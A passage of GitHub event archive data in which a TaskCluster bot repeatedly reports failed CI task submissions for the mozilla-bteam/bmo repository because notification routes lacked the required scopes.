[\n                    \"assume:repo:github.com/mozilla-bteam/bmo:branch:development\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"VQK_b1I3TyOb3ZFuykR7wg\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"API\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"webservices\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"WebService API Tests\\\",\\n    \\\"description\\\": \\\"WebService API Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:24.725Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:24.725Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"LIKR829ZSD6rLo8k_7bUQg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:24.725Z\\\"\\n}\\n  time:     2016-09-29T20:07:24.960Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"VQK_b1I3TyOb3ZFuykR7wg\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"API\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"webservices\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"WebService API Tests\\\",\\n    \\\"description\\\": \\\"WebService API Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:24.725Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:24.725Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"LIKR829ZSD6rLo8k_7bUQg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:24.725Z\\\"\\n}\\n  time:     2016-09-29T20:07:24.960Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"VQK_b1I3TyOb3ZFuykR7wg\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.dylan@hardison.net.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"API\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"webservices\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"development\",\n                            \"GITHUB_BASE_SHA\": \"4250271527caadb3eefd54ccf068f610f5d93a46\",\n                            \"GITHUB_BASE_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"dylanwh\",\n                            \"GITHUB_HEAD_SHA\": \"b205285d4b5904a59d53107ec8c423eb1890725d\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"dylan@hardison.net\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/httpd_error_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/httpd/error_log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"WebService API Tests\",\n                        \"description\": \"WebService API Tests\",\n                        \"owner\": \"dylan@hardison.net\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-29T20:07:24.725Z\",\n                    \"deadline\": \"2016-09-30T20:07:24.725Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"LIKR829ZSD6rLo8k_7bUQg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-30T20:07:24.725Z\"\n                },\n                \"time\": \"2016-09-29T20:07:24.960Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.dylan@hardison.net.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:branch:development\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-29T20:07:25Z"}
{"id":"4639631634","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-bteam/bmo"},"payload":{"comment":{"id":19230136,"position":null,"line":null,"path":null,"commit_id":"b205285d4b5904a59d53107ec8c423eb1890725d","created_at":"2016-09-29T20:07:25Z","updated_at":"2016-09-29T20:07:25Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"PP3uIWSjS8eYTKq2PSVsMQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"San\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"sanity\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"description\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:25.156Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:25.156Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"d8kWcqh7RUWXCSxXeYAuNA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:25.156Z\\\"\\n}\\n  time:     2016-09-29T20:07:25.283Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"PP3uIWSjS8eYTKq2PSVsMQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  